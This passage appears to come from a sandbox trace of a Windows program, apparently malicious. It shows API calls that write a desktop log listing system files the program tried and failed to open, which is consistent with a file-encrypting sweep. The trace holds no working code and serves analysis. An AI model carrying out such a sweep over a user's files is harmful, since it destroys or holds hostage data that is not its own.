Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\n", lpUsedDefaultChar=0x0) returned 4328 [0289.634] WriteFile (in: hFile=0x284, lpBuffer=0x1ef0aa8*, nNumberOfBytesToWrite=0x10e8, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1ef0aa8*, lpNumberOfBytesWritten=0x63fe20*=0x10e8, lpOverlapped=0x0) returned 1 [0289.643] CloseHandle (hObject=0x284) returned 1 [0289.645] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16749, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16749 [0289.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16749, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16749 [0289.646] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=16749, lpMultiByteStr=0x1ed0b48, cbMultiByte=16749, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Portable Devices\\regulations_consensus_score.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.UIF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.DIAGNOSTICS.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\cfc.flights.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.012.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\". The system cannot find the file 